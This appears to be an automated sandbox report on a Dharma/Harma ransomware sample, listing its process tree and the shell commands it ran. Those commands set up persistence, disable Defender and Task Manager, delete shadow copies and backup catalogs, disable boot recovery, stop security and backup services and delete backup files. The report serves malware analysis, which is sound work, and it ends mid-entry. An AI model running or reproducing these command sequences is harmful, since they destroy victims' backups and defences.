2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe
2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exeWMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeDebugPrivilege	1780	taskkill.exe
Token: SeDebugPrivilege	872	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1948	WMIC.exe
Token: SeSecurityPrivilege	1948	WMIC.exe
Token: SeTakeOwnershipPrivilege	1948	WMIC.exe
Token: SeLoadDriverPrivilege	1948	WMIC.exe
Token: SeSystemProfilePrivilege	1948	WMIC.exe
Token: SeSystemtimePrivilege	1948	WMIC.exe
Token: SeProfSingleProcessPrivilege	1948	WMIC.exe
Token: SeIncBasePriorityPrivilege	1948	WMIC.exe
Token: SeCreatePagefilePrivilege	1948	WMIC.exe
Token: SeBackupPrivilege	1948	WMIC.exe
Token: SeRestorePrivilege	1948	WMIC.exe
Token: SeShutdownPrivilege	1948	WMIC.exe
Token: SeDebugPrivilege	1948	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1948	WMIC.exe
Token: SeRemoteShutdownPrivilege	1948	WMIC.exe
Token: SeUndockPrivilege	1948	WMIC.exe
Token: SeManageVolumePrivilege	1948	WMIC.exe
Token: 33	1948	WMIC.exe
Token: 34	1948	WMIC.exe
Token: 35	1948	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1948	WMIC.exe
Token: SeSecurityPrivilege	1948	WMIC.exe
Token: SeTakeOwnershipPrivilege	1948	WMIC.exe
Token: SeLoadDriverPrivilege	1948	WMIC.exe
Token: SeSystemProfilePrivilege	1948	WMIC.exe
Token: SeSystemtimePrivilege	1948	WMIC.exe
Token: SeProfSingleProcessPrivilege	1948	WMIC.exe
Token: SeIncBasePriorityPrivilege	1948	WMIC.exe
Token: SeCreatePagefilePrivilege	1948	WMIC.exe
Token: SeBackupPrivilege	1948	WMIC.exe
Token: SeRestorePrivilege	1948	WMIC.exe
Token: SeShutdownPrivilege	1948	WMIC.exe
Token: SeDebugPrivilege	1948	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1948	WMIC.exe
Token: SeRemoteShutdownPrivilege	1948	WMIC.exe
Token: SeUndockPrivilege	1948	WMIC.exe
Token: SeManageVolumePrivilege	1948	WMIC.exe
Token: 33	1948	WMIC.exe
Token: 34	1948	WMIC.exe
Token: 35	1948	WMIC.exe
Token: SeBackupPrivilege	520	vssvc.exe
Token: SeRestorePrivilege	520	vssvc.exe
Token: SeAuditPrivilege	520	vssvc.exe
Token: SeDebugPrivilege	948	taskkill.exe
Token: SeDebugPrivilege	524	taskkill.exe
Token: SeDebugPrivilege	1348	taskkill.exe
Token: SeSecurityPrivilege	1940	wevtutil.exe
Token: SeBackupPrivilege	1940	wevtutil.exe
Token: SeSecurityPrivilege	1100	wevtutil.exe
Token: SeBackupPrivilege	1100	wevtutil.exe
Token: SeSecurityPrivilege	1776	wevtutil.exe
Token: SeBackupPrivilege	1776	wevtutil.exe
Token: SeSecurityPrivilege	788	wevtutil.exe
Token: SeBackupPrivilege	788	wevtutil.exe
Token: SeSecurityPrivilege	2028	wevtutil.exe
Token: SeBackupPrivilege	2028	wevtutil.exe
Token: SeSecurityPrivilege	1312	wevtutil.exe
Token: SeBackupPrivilege	1312	wevtutil.exe
Token: SeSecurityPrivilege	756	wevtutil.exe
Token: SeBackupPrivilege	756	wevtutil.exe
Token: SeSecurityPrivilege	432	wevtutil.exe
Token: SeBackupPrivilege	432	wevtutil.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

mshta.exe

pid	process
1648	mshta.exe
1648	mshta.exe
1648	mshta.exe
1648	mshta.exe
1648	mshta.exe
1648	mshta.exe
1648	mshta.exe
1648	mshta.exe
1648	mshta.exe
1648	mshta.exe
1648	mshta.exe
1648	mshta.exe
1648	mshta.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

VirusShare_5c36e305d926e55ef98d392176890cd2.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2000 wrote to memory of 1984	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 1984	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 1984	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1984 wrote to memory of 1988	1984	cmd.exe	schtasks.exe
PID 1984 wrote to memory of 1988	1984	cmd.exe	schtasks.exe
PID 1984 wrote to memory of 1988	1984	cmd.exe	schtasks.exe
PID 2000 wrote to memory of 1700	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 1700	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 1700	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 1944	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 1944	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 1944	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 584	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 584	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 584	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 584 wrote to memory of 468	584	cmd.exe	schtasks.exe
PID 584 wrote to memory of 468	584	cmd.exe	schtasks.exe
PID 584 wrote to memory of 468	584	cmd.exe	schtasks.exe
PID 2000 wrote to memory of 588	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 588	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 588	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 588 wrote to memory of 1028	588	cmd.exe	attrib.exe
PID 588 wrote to memory of 1028	588	cmd.exe	attrib.exe
PID 588 wrote to memory of 1028	588	cmd.exe	attrib.exe
PID 2000 wrote to memory of 1280	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 1280	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 1280	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1280 wrote to memory of 1448	1280	cmd.exe	schtasks.exe
PID 1280 wrote to memory of 1448	1280	cmd.exe	schtasks.exe
PID 1280 wrote to memory of 1448	1280	cmd.exe	schtasks.exe
PID 2000 wrote to memory of 520	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 520	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 520	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 520 wrote to memory of 672	520	cmd.exe	schtasks.exe
PID 520 wrote to memory of 672	520	cmd.exe	schtasks.exe
PID 520 wrote to memory of 672	520	cmd.exe	schtasks.exe
PID 2000 wrote to memory of 2020	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 2020	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 2020	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2020 wrote to memory of 1692	2020	cmd.exe	attrib.exe
PID 2020 wrote to memory of 1692	2020	cmd.exe	attrib.exe
PID 2020 wrote to memory of 1692	2020	cmd.exe	attrib.exe
PID 2000 wrote to memory of 592	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 592	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 592	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 592 wrote to memory of 868	592	cmd.exe	attrib.exe
PID 592 wrote to memory of 868	592	cmd.exe	attrib.exe
PID 592 wrote to memory of 868	592	cmd.exe	attrib.exe
PID 2000 wrote to memory of 980	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 980	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 980	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 980 wrote to memory of 2040	980	cmd.exe	cmd.exe
PID 980 wrote to memory of 2040	980	cmd.exe	cmd.exe
PID 980 wrote to memory of 2040	980	cmd.exe	cmd.exe
PID 2000 wrote to memory of 1388	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 1388	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 2000 wrote to memory of 1388	2000	VirusShare_5c36e305d926e55ef98d392176890cd2.exe	cmd.exe
PID 1388 wrote to memory of 1116	1388	cmd.exe	cmd.exe
PID 1388 wrote to memory of 1116	1388	cmd.exe	cmd.exe
PID 1388 wrote to memory of 1116	1388	cmd.exe	cmd.exe
PID 1388 wrote to memory of 1780	1388	cmd.exe	taskkill.exe
PID 1388 wrote to memory of 1780	1388	cmd.exe	taskkill.exe
PID 1388 wrote to memory of 1780	1388	cmd.exe	taskkill.exe
PID 2040 wrote to memory of 1132	2040	cmd.exe	icacls.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

1028 attrib.exe
1692 attrib.exe
868 attrib.exe
948 attrib.exe
880 attrib.exe

pid	process
1028	attrib.exe
1692	attrib.exe
868	attrib.exe
948	attrib.exe
880	attrib.exe

C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe
"C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:1988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
2⤵
- Drops startup file
PID:1700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
2⤵
PID:1944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:584

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
3⤵
- Creates scheduled task(s)
PID:468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:588

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
3⤵
- Drops startup file
- Views/modifies file attributes
PID:1028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1280

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:1448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /F
2⤵
- Suspicious use of WriteProcessMemory
PID:520

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /F
3⤵
- Creates scheduled task(s)
PID:672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s harma.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\system32\attrib.exe
attrib +h +s harma.exe
3⤵
- Views/modifies file attributes
PID:1692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\harma.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:592

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\harma.exe
3⤵
- Views/modifies file attributes
PID:868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
- Suspicious use of WriteProcessMemory
PID:980

C:\Windows\system32\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\system32\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
4⤵
- Modifies file permissions
PID:1132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
2⤵
- Suspicious use of WriteProcessMemory
PID:1388

C:\Windows\system32\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
3⤵
PID:1116

C:\Windows\system32\taskkill.exe
taskkill /t /f /im sql*
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:872

C:\Windows\system32\taskkill.exe
taskkill /f /t /im veeam*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
2⤵
PID:1740

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:1960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy HRMPRIV C:\ProgramData\HRMPRIV
2⤵
PID:1844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy HRMPUB C:\ProgramData\HRMPUB
2⤵
PID:712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy id.harma C:\ProgramData\id.harma
2⤵
PID:788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\HRMPRIV %userprofile%\Desktop\HRMPRIV
2⤵
PID:1736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\FILES ENCRYPTED.txt" "%userprofile%\Desktop\FILES ENCRYPTED.txt"
2⤵
PID:1328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:1588

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:1560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:1996

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:1992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:1956

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:1980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:1700

C:\Windows\system32\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:1940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\FILES ENCRYPTED.txt" && exit
2⤵
PID:540

C:\Windows\system32\cmd.exe
cmd.exe /c "C:\ProgramData\FILES ENCRYPTED.txt"
3⤵
PID:828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
2⤵
PID:1608

C:\Windows\system32\cmd.exe
cmd.exe /c vssadmin Delete Shadows /All /Quiet
3⤵
PID:2028

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /All /Quiet
4⤵
- Interacts with shadow copies
PID:1708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
2⤵
PID:316

C:\Windows\system32\cmd.exe
cmd.exe /c wmic shadowcopy delete
3⤵
PID:1560

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
2⤵
PID:1704

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
3⤵
PID:1952

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} boostatuspolicy ignoreallfailures
4⤵
- Modifies boot configuration data using bcdedit
PID:672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
2⤵
PID:1980

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} recoveryenabled no
3⤵
PID:1540

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
4⤵
- Modifies boot configuration data using bcdedit
PID:1692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
2⤵
PID:580

C:\Windows\system32\cmd.exe
cmd.exe /c wbadmin delete catalog -quiet/
3⤵
PID:1908

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet/
4⤵
- Deletes backup catalog
- Drops file in Windows directory
PID:1532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop avpsus /y
2⤵
PID:1156

C:\Windows\system32\net.exe
net stop avpsus /y
3⤵
PID:592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
4⤵
PID:896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
2⤵
PID:1224

C:\Windows\system32\net.exe
net stop McAfeeDLPAgentService /y
3⤵
PID:1084

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
4⤵
PID:1740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop mfewc /y
2⤵
PID:636

C:\Windows\system32\net.exe
net stop mfewc /y
3⤵
PID:1348

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
4⤵
PID:1800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y
2⤵
PID:688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y
2⤵
PID:1268

C:\Windows\system32\net.exe
net stop NetBackup BMR MTFTP Service /y
3⤵
PID:1252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
4⤵
PID:364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled
2⤵
PID:1524

C:\Windows\system32\sc.exe
sc config SQLTELEMETRY start=disabled
3⤵
- Launches sc.exe
PID:1456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:1528

C:\Windows\system32\sc.exe
sc config SQLTELEMETRY$ECWDB2 start= disabled
3⤵
- Launches sc.exe
PID:316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled
2⤵
PID:1716

C:\Windows\system32\sc.exe
sc config SQLWriter start= disabled
3⤵
- Launches sc.exe
PID:1736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled
2⤵
PID:1944

C:\Windows\system32\sc.exe
sc config SstpSvc start= disabled
3⤵
- Launches sc.exe
PID:580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F
2⤵
PID:544

C:\Windows\system32\taskkill.exe
taskkill /IM mspub.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F
2⤵
PID:868

C:\Windows\system32\taskkill.exe
taskkill /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F
2⤵
PID:1800

C:\Windows\system32\taskkill.exe
taskkill /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:1628

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
2⤵
PID:1528

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
2⤵
PID:580

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:1944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
2⤵
PID:948

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
2⤵
PID:1156

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
2⤵
PID:1388

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
2⤵
PID:1144

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
2⤵
PID:1100

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
2⤵
PID:756

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
2⤵
PID:1160

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
2⤵
PID:1608

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
2⤵
PID:208

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
2⤵
PID:1328

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:1980

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q c:*.VHD c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win c:*.dsk
2⤵
PID:1768

C:\Windows\system32\cmd.exe
